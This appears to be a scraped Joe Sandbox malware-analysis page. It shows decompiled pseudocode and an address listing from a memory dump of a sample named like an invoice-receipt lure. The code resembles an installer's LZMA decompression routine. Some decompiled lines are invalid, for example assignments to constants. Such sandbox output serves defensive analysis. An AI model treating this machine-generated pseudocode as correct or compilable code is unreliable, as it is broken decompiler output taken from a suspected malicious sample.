												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406409
0x00406409
0x0040640d
0x0040641a
0x00406424
0x00000000
0x0040640f
0x0040640f
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00406343
0x00406346
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x004066b8
0x004066b8
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x0040673a
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004066bb
0x004066b8
0x00000000
0x0040640d

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406355, Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406355() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
